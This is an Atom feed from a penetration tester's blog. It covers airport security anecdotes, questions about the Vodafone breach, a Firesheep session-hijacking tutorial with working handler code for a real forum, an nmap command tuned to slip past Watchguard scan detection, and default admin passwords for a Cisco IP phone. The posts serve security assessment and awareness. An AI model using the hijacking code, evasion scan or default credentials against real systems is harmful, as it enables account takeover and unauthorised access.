<?xml version="1.0" encoding="UTF-8"?>
<!--Generated by Squarespace Site Server v5.11.81 (http://www.squarespace.com/) on Mon, 28 May 2012 19:12:24 GMT--><feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/"><title>Blog</title><subtitle>Blog</subtitle><id>http://www.penetrationtester.com/blog/</id><link rel="alternate" type="application/xhtml+xml" href="http://www.penetrationtester.com/blog/"/><link rel="self" type="application/atom+xml" href="http://www.penetrationtester.com/blog/atom.xml"/><updated>2012-05-28T13:08:44Z</updated><generator uri="http://www.squarespace.com/" version="Squarespace Site Server v5.11.81 (http://www.squarespace.com/)">Squarespace</generator><entry><title>Airport control fail (again)</title><id>http://www.penetrationtester.com/blog/2012/5/28/airport-control-fail-again.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2012/5/28/airport-control-fail-again.html"/><author><name>Chris Gatford</name></author><published>2012-05-28T12:28:11Z</published><updated>2012-05-28T12:28:11Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p><span class="full-image-block ssNonEditable">I, and perhaps the rest of the IT Security industry, look at the security theatre when travelling and find it something of an amusement. Taking nail files off an old lady, making injured people walk without crutches, being forced to take off shoes in the USA. It is all very, very stupid.</span></p>
<p>The sad thing is that the front-line staff have had finding nail files and scissors drummed into them so thoroughly that they can't see the real threats. As an IT security professional I travel with an assortment of unusual items to perform penetration testing, and when required for physical/social engineering jobs this includes lock picks, access card cloning tools etc. (At AusCERT we ran a social engineering tutorial, and as part of that we had a hands-on class on proximity card cloning as well as lock picking to illustrate points.)</p>
<p>Recently, due to a last-minute change at the airport when coming back from AusCERT, I had to carry on a bag that I had not planned to.</p>
<p>So when I got to security and had to remove my laptop, I looked down and thought: this is not going to go well. As my bag went through the X-ray machine, this is a sample of some of the lock pick gear they would have seen in it.</p>
<p><span class="full-image-block ssNonEditable"><span><img src="http://www.penetrationtester.com/storage/Screen%20Shot%202012-05-28%20at%2010.38.28%20PM.png?__SQUARESPACE_CACHEVERSION=1338208962964" alt="" /></span></span><img src="http://www.penetrationtester.com/storage/picks.png?__SQUARESPACE_CACHEVERSION=1338209281539" alt="" /></p>
<p>&nbsp;</p>
<p>The funny part is that they asked me if I had a nail file in there. I opened my bag, ready to explain the reason behind these items. Well, they picked out one item that resembled a nail file, put it in its own tray and put it through the metal detector, and the thought of losing my nail file collection (aka the "toool" credit-card-size lock pick kit) was not pleasant, but better than losing everything.</p>
<p>&nbsp;</p>
<p><span class="full-image-block ssNonEditable"><span><img src="http://www.penetrationtester.com/storage/mklp02-21.jpg?__SQUARESPACE_CACHEVERSION=1338210057160" alt="" /></span></span></p>
<p>They then said yep, that was it, and promptly gave it back, to my honest shock.</p>
<p>You just can't make up theatre this good.</p>
<p>&nbsp;</p>]]></content></entry><entry><title>Airport the fail whale of security controls.</title><id>http://www.penetrationtester.com/blog/2012/3/7/airport-the-fail-whale-of-security-controls.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2012/3/7/airport-the-fail-whale-of-security-controls.html"/><author><name>Chris Gatford</name></author><published>2012-03-07T04:31:45Z</published><updated>2012-03-07T04:31:45Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>I am sitting on a Virgin flight and reviewing all the security mistakes. At the moment something in my bags or on the person of yours truly gets a hit as explosives. The last two flights, when I get selected for swabbing, I get the double positive reading, which requires a "supervisor" sign-off, a form of questions to fill in and extra viewing of my ID, which I have to hand over.</p>
<p>Rather than help work out what is setting it off, they prefer to just make me sign a form. I told them this was the second time in 3 weeks.</p>
<p>They demanded to see my boarding pass; I explained I was using the new Virgin mobile boarding pass and showed them a 3D barcode.</p>
<p>Next, at the gate, after scanning the boarding pass on my mobile, the person at the gate waved me on. At the plane I showed them the 3D barcode and the guy could not compute; he demanded my phone so he could run back and validate my boarding pass. I refused and he broke.</p>
<p>I told him what seat I was in and that he could visit me if there was a problem. This allowed me onto the plane without validation (a trivial control, but the airport's nonetheless), as they have to validate all who enter the plane or they cannot take off.</p>
<p>The Virgin app isn't even that good, as it loses all the flight data if you navigate away (pro tip: screenshot it on your mobile device). At least the URL to navigate to the boarding pass looked encrypted.</p>]]></content></entry><entry><title>The Vodafone Debacle</title><id>http://www.penetrationtester.com/blog/2011/1/10/the-vodafone-debacle.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2011/1/10/the-vodafone-debacle.html"/><author><name>Chris Gatford</name></author><published>2011-01-09T21:43:53Z</published><updated>2011-01-09T21:43:53Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>Thoughts on what we, the public and customers, should be asking of Vodafone:</p>
<p>&nbsp;</p>
<ol>
<li>Why was something that accesses the most sensitive data of its customers not protected with a two-factor authentication mechanism?</li>
<li>What controls does Vodafone use to catch users attempting to capture large batches of users via searches (i.e. search "a" then "b", or account no. 123 then 124, etc.)?</li>
<li>Did they not perform analysis on the patterns of login to IP address to identify unusual behaviour? i.e. login account "ben" has logged in from 20 IP addresses in the last month.</li>
<li>Why did they not implement simple controls such as locking logins to specific IP addresses, as a low-ball security control?</li>
<li>Who are their auditors, and why did they not raise such a potentially high-risk problem?</li>
</ol>
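<p>Questions 2 and 3 above describe two detections. The following is an added example (not from the original post, and unrelated to Vodafone's actual systems) that runs both over constructed audit log lines: a login used from too many distinct source addresses inside a rolling window, and a login walking account numbers in sequence or pulling records faster than a person could read them. The log format, field names, thresholds and sample data are all assumptions made for the example.</p>

```javascript
// Added example, not from the original post and unrelated to Vodafone's real
// systems. Log format ("timestamp key=value ..."), field names, thresholds and
// the sample data are assumptions made for this example.

// Parse one audit line into a record; returns null for junk.
function parseLine(line) {
  const m = line.match(/^(\S+)\s+(.*)$/);
  if (!m) return null;
  const rec = { ts: new Date(m[1]) };
  for (const kv of m[2].split(/\s+/)) {
    const i = kv.indexOf('=');
    if (i > 0) rec[kv.slice(0, i)] = kv.slice(i + 1);
  }
  return Number.isNaN(rec.ts.getTime()) || !rec.login ? null : rec;
}

// Group records of one action type by login, each group sorted by time.
function groupByLogin(records, action) {
  const groups = new Map();
  for (const r of records) {
    if (r.action !== action) continue;
    if (!groups.has(r.login)) groups.set(r.login, []);
    groups.get(r.login).push(r);
  }
  for (const rs of groups.values()) rs.sort((a, b) => a.ts - b.ts);
  return groups;
}

// Question 3: a login used from more than maxIps distinct source addresses
// inside any rolling window of windowDays (a shared or leaked credential).
function findSharedLogins(records, { maxIps = 5, windowDays = 30 } = {}) {
  const windowMs = windowDays * 86400 * 1000, hits = [];
  for (const [login, rs] of groupByLogin(records, 'login')) {
    const inWindow = new Map();   // src ip -> logins from it inside the window
    let lo = 0, peak = 0;
    for (let hi = 0; hi < rs.length; hi++) {
      inWindow.set(rs[hi].src, (inWindow.get(rs[hi].src) || 0) + 1);
      while (rs[hi].ts - rs[lo].ts > windowMs) {       // slide the window forward
        const ip = rs[lo++].src, n = inWindow.get(ip);
        if (n === 1) inWindow.delete(ip); else inWindow.set(ip, n - 1);
      }
      peak = Math.max(peak, inWindow.size);
    }
    if (peak > maxIps) hits.push({ login, distinctIps: peak });
  }
  return hits;
}

// Question 2: a login walking account numbers in order (123, 124, 125 ...)
// or issuing more lookups in one minute than a person could read.
function findEnumeration(records, { minRun = 5, maxPerMinute = 20 } = {}) {
  const hits = [];
  for (const [login, rs] of groupByLogin(records, 'lookup')) {
    let run = 1, longest = 1, lo = 0, burst = 0;
    for (let i = 1; i < rs.length; i++) {
      run = Number(rs[i].account) === Number(rs[i - 1].account) + 1 ? run + 1 : 1;
      longest = Math.max(longest, run);
    }
    for (let hi = 0; hi < rs.length; hi++) {
      while (rs[hi].ts - rs[lo].ts > 60000) lo++;       // one-minute window
      burst = Math.max(burst, hi - lo + 1);
    }
    if (longest >= minRun || burst > maxPerMinute) {
      hits.push({ login, sequentialRun: longest, peakPerMinute: burst });
    }
  }
  return hits;
}

function analyze(lines) {
  const records = lines.map(parseLine).filter(Boolean);
  return { sharedLogins: findSharedLogins(records), enumeration: findEnumeration(records) };
}

// Constructed sample log: one normal user, one login shared across seven
// addresses, and one dealer login reading consecutive account numbers.
const SAMPLE_LOG = [
  '2011-01-03T09:00:00Z login=alice src=198.51.100.10 action=login',
  '2011-01-03T09:05:00Z login=alice src=198.51.100.10 action=lookup account=4471209',
  '2011-01-03T11:20:00Z login=alice src=198.51.100.10 action=lookup account=2291816',
];
for (let i = 0; i < 7; i++) {
  SAMPLE_LOG.push(`2011-01-${String(4 + i).padStart(2, '0')}T08:00:00Z login=ben src=203.0.113.${10 + i} action=login`);
}
for (let i = 0; i < 8; i++) {
  const ts = new Date(Date.UTC(2011, 0, 6, 14, 0, i * 30)).toISOString().replace('.000Z', 'Z');
  SAMPLE_LOG.push(`${ts} login=dealer42 src=192.0.2.9 action=lookup account=${1000120 + i}`);
}

console.log(JSON.stringify(analyze(SAMPLE_LOG), null, 2));
```

<p>The thresholds are the tunable part; the prerequisite for either check is that every lookup is logged with the login, the source address and the account identifier in the first place.</p>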
<p>I very much doubt that we will ever know the true data loss that has occurred over the years at Vodafone. And what of the other telcos? Perhaps they are doing something better, but I wouldn't put money on it.</p>
<p>Let's hope the NSW Privacy Commissioner actually does something with this event and takes action.</p>
<p>&nbsp;</p>]]></content></entry><entry><title>Writing Firesheep Scripts</title><id>http://www.penetrationtester.com/blog/2010/11/2/writing-firesheep-scripts.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2010/11/2/writing-firesheep-scripts.html"/><author><name>Chris Gatford</name></author><published>2010-11-02T10:22:33Z</published><updated>2010-11-02T10:22:33Z</updated><content type="html" xml:lang="en-US"><![CDATA[<div>
<p>A lot has been written about Firesheep, and whilst I have provided some commentary on it myself, not much has been said about the fact that it relies on site-specific handler scripts tailored to each site it targets. Curious, I had a quick play and wrote up a couple of scripts for some Australian sites I have used.</p>
<p><em>NB: All of the sites I tested used plain HTTP for the sign-in process by default; some offered HTTPS, but only as an additional link to click. Note that Firesheep does not need the login itself to be in the clear: it only needs the session cookie to be sent over HTTP on a later request, which happens whenever the cookie is set without the Secure flag.</em></p>
<p>It's a pretty straightforward process:</p>
<p>1) Identify the correct domain for the site.</p>
<p>2) List the cookies that make up the session (normally the ones set after you have authenticated).</p>
<p>3) Identify the section of the page in which the username is displayed.</p>
<p>4) Modify the identifyUser function. For the sites I looked at this meant changing the selector in this.userName = resp.body.querySelector('changeme').innerHTML;</p>
<p>The 'changeme' value above has to be a CSS selector matching the element that holds the username. For Whirlpool, for example, the page source snippet looks like this:</p>
<p><span class="full-image-block ssNonEditable"><span><img src="http://www.penetrationtester.com/storage/post-images/pic%20of%20html%20%20whirlpool.png?__SQUARESPACE_CACHEVERSION=1288873230831" alt="" /></span></span><span class="full-image-block ssNonEditable"><br /></span></p>
<p>The username is then referenced as follows within the script:</p>
<p>this.userName = resp.body.querySelector('dl.userinfo span').innerHTML;</p>
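<p>The four steps above, as an added example that is not code from the original post or from the Firesheep project: a Whirlpool handler in the shape Firesheep's bundled handlers use (name, url, domains, sessionCookieNames, identifyUser), together with a minimal Node stand-in for the parts of Firesheep that consume it, so the sniff, match and identify flow can be run offline. The domain, the cookie name wpsession, the captured request, the page HTML and the tiny fake DOM behind querySelector are all assumptions for the example; take the real cookie names from the site you are testing.</p>

```javascript
// Added example (not code from the original post or from Firesheep): a
// Whirlpool handler plus a minimal Node stand-in for the parts of Firesheep
// that use it. Assumptions not on the page: the domain, the cookie name
// 'wpsession', the sample request and page below, and the fake DOM.
const handlers = [];
function register(handler) { handlers.push(handler); }   // stands in for Firesheep's register()

// Fake resp.body: supports descendant selectors built from "tag" or
// "tag.class" parts (enough for 'dl.userinfo span'). Real handlers get a DOM.
function fakeBody(html) {
  return {
    querySelector(selector) {
      let pos = 0, last = null;
      for (const part of selector.trim().split(/\s+/)) {
        const [tag, cls] = part.split('.');
        const re = new RegExp(`<${tag}\\b([^>]*)>`, 'gi');
        re.lastIndex = pos;
        let m, found = null;
        while ((m = re.exec(html)) !== null) {
          if (!cls || new RegExp(`class="[^"]*\\b${cls}\\b[^"]*"`).test(m[1])) { found = m; break; }
        }
        if (!found) return null;
        pos = found.index + found[0].length;
        last = { tag, start: pos };
      }
      if (!last) return null;
      const end = html.indexOf(`</${last.tag}>`, last.start);
      return { innerHTML: html.slice(last.start, end === -1 ? undefined : end).trim() };
    },
  };
}

// The handler: domains + sessionCookieNames pick the session out of sniffed
// traffic; identifyUser replays a request with the captured cookies and
// scrapes the username from the logged-in page.
register({
  name: 'Whirlpool',
  url: 'http://forums.whirlpool.net.au/',
  domains: ['whirlpool.net.au'],
  sessionCookieNames: ['wpsession'],   // placeholder; read the real names from the site
  identifyUser: function () {
    const resp = this.httpGet(this.siteUrl);
    this.userName = resp.body.querySelector('dl.userinfo span').innerHTML;
  },
});

// Pull Host and Cookie out of one captured plaintext HTTP request.
function parseRequest(raw) {
  const headers = {}, cookies = {};
  for (const line of raw.split('\r\n\r\n')[0].split('\r\n').slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  for (const kv of (headers.cookie || '').split(';')) {
    const j = kv.indexOf('=');
    if (j > 0) cookies[kv.slice(0, j).trim()] = kv.slice(j + 1).trim();
  }
  return { host: (headers.host || '').toLowerCase(), cookies };
}

// Steps 1 and 2: the request must be for one of the handler's domains and
// carry every named session cookie. Returns the captured session or null.
function matchSession(req) {
  for (const h of handlers) {
    const onDomain = h.domains.some(d => req.host === d || req.host.endsWith('.' + d));
    if (!onDomain || !h.sessionCookieNames.every(n => n in req.cookies)) continue;
    const cookies = Object.fromEntries(h.sessionCookieNames.map(n => [n, req.cookies[n]]));
    return { handler: h, cookies };
  }
  return null;
}

// Steps 3 and 4: run identifyUser with an httpGet that "fetches" using the
// captured cookies. fetchPage stands in for the real HTTP request.
function identify(session, fetchPage) {
  const ctx = {
    siteUrl: session.handler.url,
    userName: null,
    httpGet(url) { return { body: fakeBody(fetchPage(url, session.cookies)) }; },
  };
  session.handler.identifyUser.call(ctx);
  return ctx.userName;
}

// Constructed sample: one sniffed request and the page the site would serve
// to that session (mirrors the dl.userinfo snippet in the post).
const SAMPLE_REQUEST = 'GET /forum/ HTTP/1.1\r\nHost: forums.whirlpool.net.au\r\n' +
  'Cookie: wpsession=abc123; lastvisit=1288873230\r\n\r\n';
const SAMPLE_PAGE = '<html><body><dl class="userinfo"><dt>Logged in as</dt>' +
  '<dd><span>chrisg</span></dd></dl></body></html>';

function demo() {
  const session = matchSession(parseRequest(SAMPLE_REQUEST));
  return session ? identify(session, () => SAMPLE_PAGE) : null;
}
console.log(demo());
```

<p>To check one of your own applications, swap the sample request for a request captured from a logged-in browser over HTTP and the cookie names for the ones it sets: if matchSession returns a session, the cookie is exposed to exactly this attack.</p>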
<p>One thing I did notice when running Firesheep was the number of third-party connectors that sites were running. As these were embedded in the news site I was viewing, they automatically connected back to the third-party service over HTTP.</p>
<p>In one example the page had a bit.ly bookmark widget and a Facebook connector. If you had an open session with that service in another window, or had opted to stay logged in by ticking the box (which I guess many users do), the browser would send the session cookies along with that plaintext request, and the session would appear in Firesheep, without you ever visiting the third-party site itself.</p>
<p>&nbsp;I don't condone illegal activity and have provided the above information for people to evaluate their own applications or the applications they&nbsp;legitimately&nbsp;have access to.&nbsp;</p>
<p>The following firesheep scripts were written with help from RD (Thanks Mate).</p>
<p><a href="http://hacklabs.com/storage/tools/firesheep/Whirlpool.js">Whirlpool</a>&nbsp;<a href="http://hacklabs.com/storage/tools/firesheep/Optus%20WebMail.js">Optus</a>&nbsp;<a href="http://hacklabs.squarespace.com/storage/tools/firesheep/seek.js">Seek</a></p>
</div>]]></content></entry><entry><title>Wifi can be surprising !</title><id>http://www.penetrationtester.com/blog/2010/10/12/wifi-can-be-surprising.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2010/10/12/wifi-can-be-surprising.html"/><author><name>Chris Gatford</name></author><published>2010-10-12T11:28:17Z</published><updated>2010-10-12T11:28:17Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>So I thought I'd share this: there I was on the Manly ferry, trying to sort out a wifi issue with some portable equipment I had, in the middle of Sydney Harbour. Anyhow, I see the below AP pop up, which, given that I was passing Manly Heads, was a <strong><span style="text-decoration: underline;">surprise</span></strong>. Note that there was no encryption (which was not a surprise in itself).</p>
<p style="text-align: center;"><img src="http://www.penetrationtester.com/storage/IMG_0062.PNG?__SQUARESPACE_CACHEVERSION=1286883057758" alt="" /></p>
<p style="text-align: center;">&nbsp;</p>
<p style="text-align: left;">But then, after seeing that, I finally looked up and saw that we were overtaking this ;-)</p>
<p style="text-align: center;">&nbsp;<span class="full-image-block ssNonEditable"><span><img src="http://www.penetrationtester.com/storage/IMG_0061-small.png?__SQUARESPACE_CACHEVERSION=1286883738479" alt="" /></span></span></p>
<p style="text-align: left;">&nbsp;</p>]]></content></entry><entry><title>7 Tips for Small Business IT Security</title><id>http://www.penetrationtester.com/blog/2010/2/2/7-tips-for-small-business-it-security.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2010/2/2/7-tips-for-small-business-it-security.html"/><author><name>Chris Gatford</name></author><published>2010-02-02T20:33:52Z</published><updated>2010-02-02T20:33:52Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>As on ABC Radio when I was interviewed along with <a href="http://www.suretegroup.com.au">Alastair MacGibbon</a>&nbsp;on IT Security, I mentioned several resources and key tasks to ensure you maintain a good level of security for your organisation or family PC. Here is a quick summary and a list of resources.</p>
<ul>
<li>Passwords   
<ul>
<li>Weak password selection by users is still the most common way an organisation is compromised. Choose a phrase and use the first letter of each word as your password, then add a symbol at the start or end, e.g. @yourpasswordvaluehere! Use a different password for each site or system, so that one leaked password does not unlock the rest.</li>
</ul>
</li>
</ul>
<ul>
<li>Protecting your system from Malware;    
<ul>
<li>There are several good solutions, some of them free; my pick of the free offerings is <a href="http://free.avg.com/au-en/download-avg-anti-virus-free">AVG</a>.</li>
<li>The commercial offerings are always battling it out in the reviews, and some shine above others. <a href="http://www.sophos.com">Sophos</a> is one I often see in the field doing a good job, IMHO.</li>
<li>When selecting antivirus or, these days, malware protection, look for something that covers all of your online activity (email, web browsing and social media).</li>
</ul>
</li>
</ul>
<ul>
<li>Patch your software;   
<ul>
<li>Windows users are often compromised through unpatched software. Windows has a built-in update process (Windows Update), which should be set to install updates automatically.</li>
<li>Third-party software also needs to be updated regularly. Not sure whether yours is up to date? Try <a href="http://secunia.com/vulnerability_scanning/personal/">the free online tool from Secunia</a> to check whether any of the software on your machine has known vulnerabilities.</li>
</ul>
</li>
</ul>
<ul>
<li>Data Encryption    
<ul>
<li>Windows' built-in encryption tools are very effective against casual attackers. Windows has had file encryption (EFS) for many years, all seamless to the end user, and the Ultimate and Enterprise editions of Windows 7 and Vista include BitLocker full-disk encryption, which is very simple to enable. Note that disk encryption only protects data at rest (a lost or stolen machine); it does nothing against malware running while you are logged in.</li>
</ul>
</li>
</ul>
<ul>
<li>Firewalls   
<ul>
<li>Concerned that you might have services exposed to the internet? Perform a quick free scan at the <a href="https://www.grc.com/x/ne.dll?bh0bkyd2">Shields Up</a> website to discover which ports are open.</li>
<li>If your organisation is starting to look at something more than just an ADSL modem between you and the internet, or you need more control over what your employees are doing online, then an entry-level firewall will help. They often do many, if not all, of the tasks of the big corporate boxes without the need for costly staff or $$$. My recommendation for ease of use and features is the <a href="http://www.watchguard.com/">Watchguard</a> range of systems.</li>
</ul>
</li>
</ul>
<ul>
<li>Online/Social Media   
<ul>
<li>The benefits of using Facebook, MySpace, LinkedIn and other social media sites to promote your business or catch up with friends and family are wonderful. But as online criminals widen their attack vectors, be conscious of what you post online. My advice is: don't post anything online that you are not prepared to pin to the letter box at the front of your house.</li>
</ul>
</li>
</ul>
<ul>
<li>Outsource   
<ul>
<li>If you are about to set up online but don't have the time or money to buy the right equipment or hire staff or consultants (like myself), consider looking at <a href="http://www.rackspace.com">Rackspace</a>, who provide online virtual servers to which you get full access, and whose excellent support staff you can consult.</li>
</ul>
</li>
</ul>]]></content></entry><entry><title>Onwards</title><id>http://www.penetrationtester.com/blog/2009/6/2/onwards.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2009/6/2/onwards.html"/><author><name>Chris Gatford</name></author><published>2009-06-03T02:29:02Z</published><updated>2009-06-03T02:29:02Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p><span class="text">I left Pure Hacking yesterday after 2.5 years. I had a great time, but it is now onwards and upwards as the Director of <a href="http://www.hacklabs.com">HackLabs</a>. HackLabs is a new boutique <a href="http://www.hacklabs.com">penetration testing</a> company looking forward to making a significant impact on the industry.</span></p>]]></content></entry><entry><title>Nmap Scanning past Watchguard Firewalls</title><id>http://www.penetrationtester.com/blog/2009/4/30/nmap-scanning-past-watchguard-firewalls.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2009/4/30/nmap-scanning-past-watchguard-firewalls.html"/><author><name>Chris Gatford</name></author><published>2009-04-30T10:51:50Z</published><updated>2009-04-30T10:51:50Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>I often come up against Watchguard firewalls, and they are not bad little firewalls for small to medium-sized organisations, mostly because they have quite a bit enabled by default. One of those features is the port scan detection module, which blocks a source IP once it detects a port scan. One of the problems for pen testers is that it does not have a whitelist, so for a client it's either on or off.</p>
<p>When performing an infrastructure penetration test it is important to get good, reliable port scans. We often ask customers to turn the detection off so that we capture every open port, because we rarely have the luxury of time to run scans slow enough to stay under the detection threshold. As clients who run Watchguard only have the option of on or off, it will most often remain enabled and force the tester to do a slow scan.</p>
<p>After playing with a few different timings, the nmap command I found to get the scans done quickest against the default Watchguard settings, without getting my IP blocked, was the following:</p>
<p><em>nmap -sS -iL targetlist.txt -P0 -sV -T2</em></p>
<p>Done with the full port range (-p1-65535) on four IPs it takes 1000 seconds to complete. -T2 ("polite") is the timing template; the scale runs from -T0 ("paranoid", the slowest) to -T5 ("insane", the fastest). -P0 is the old spelling of -Pn: it skips host discovery, so a host that does not answer ping is still port-scanned rather than assumed down.</p>
<p><em>(March 2010 - updated due to change in Watchguard default settings)</em></p>]]></content></entry><entry><title>Risky Business Podcast #85</title><id>http://www.penetrationtester.com/blog/2008/11/3/risky-business-podcast-85.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2008/11/3/risky-business-podcast-85.html"/><author><name>Chris Gatford</name></author><published>2008-11-03T01:21:00Z</published><updated>2008-11-03T01:21:00Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>I was listening to the Risky Business podcast this morning (by the way, thanks Patrick, you do a great job putting the show together). In episode 85 (http://itradio.com.au/?p=206) Patrick talks to one of his sponsors and legendary security expert Marcus Ranum. Old Marcus has some funny views on pen testing and I think they are slightly missing the mark.</p><br/><p>Marcus believes that tools such as CORE Impact and Metasploit are not a good idea as they make a pen tester lazy (if I could generalise his comments to mean that). The things that were left out, which are an argument as to why tools such as the above are needed and why pen testing is still a valuable exercise, are illustrated by the following points:</p><br/><p>1. A pen test is not just exploitation of devices! A pen test is about using the technical access you gain to gather business-sensitive information to highlight the risk of weak IT security controls. It's not about just getting the access! Whilst the techs in the target organisation understand the impact, it's about highlighting the business impact should someone malicious exploit the same vulnerability and attempt to extract sensitive business information or disrupt operations; this is what senior management are interested in.</p><br/><p>2. The tools that assist a penetration tester, such as CORE Impact and Metasploit, are only as good as the person driving them.
CORE Impact, whilst it has a handy automated wizard, still requires the manual process to get complete coverage. The reason customers like this tool being used is that it has great logging and reporting of all actions taken. Also, as a tester, when you are finished all you have to do is select cleanup and it removes all the agents (control modules you have installed whilst you have been exploiting systems). Once again, great to show compromised hosts, but unless you link these to business risk it's not that good for the customer. (Disclosure: Pure Hacking are re-sellers for CORE Impact)</p><br/><p>3. Coverage - The old problem with any consulting job is time, and with a pen test time is always limited. Customers might not want to dedicate much time to the assessment but still expect a tester to find all the holes! That is obviously a tough job; with scanning tools at least you get coverage of the target environment, and whilst it's working away you focus on the other manual tasks of the test.</p><br/><p>4. The win or lose scenario for pen testers. This is not something we are too concerned about; it's great to compromise a customer network and illustrate a security attack vector that they had not thought of, but we still get paid even if we don't find any security weaknesses. In saying that, however, there are always security controls that can be strengthened to help reduce the risk an environment is exposed to.</p><br/><p>5. Also, both tools have very limited web application security support, and the shift to web application security testing has been very significant in the last 3 years.
Most pen testing I perform (70%) is now on web applications.</p><br/><p>Happy to hear constructive thoughts on my post.</p>]]></content></entry><entry><title>Cisco IP Phone 7936 Default Passwords</title><id>http://www.penetrationtester.com/blog/2008/9/30/cisco-ip-phone-7936-default-passwords.html</id><link rel="alternate" type="text/html" href="http://www.penetrationtester.com/blog/2008/9/30/cisco-ip-phone-7936-default-passwords.html"/><author><name>Chris Gatford</name></author><published>2008-09-30T06:02:00Z</published><updated>2008-09-30T06:02:00Z</updated><content type="html" xml:lang="en-US"><![CDATA[<p>I found it hard to find some of this info, so I thought I'd mention it on my blog for fellow hackers/pen testers.</p><br/><p>Default passwords for the Cisco IP Phone 7936:</p><br/><p>User-level access @ web interface: 7936</p><br/><p>Admin-level access @ web interface: **#</p><br/><p>No actual username is required! After doing a bit of research it turns out that if you change these passwords, the rightful owner has no mechanism to change them back. If you thought a re-flash might be the answer, the device requires administrator access to perform that function, so there is no way to reset to factory defaults without admin access. There are a few stories of bricked phones as a result!</p><p>On an engagement, treat an unchanged default as a finding in its own right, and do not change the passwords on a phone you are not authorised to reconfigure, since there is no recovery path.</p>]]></content></entry></feed>
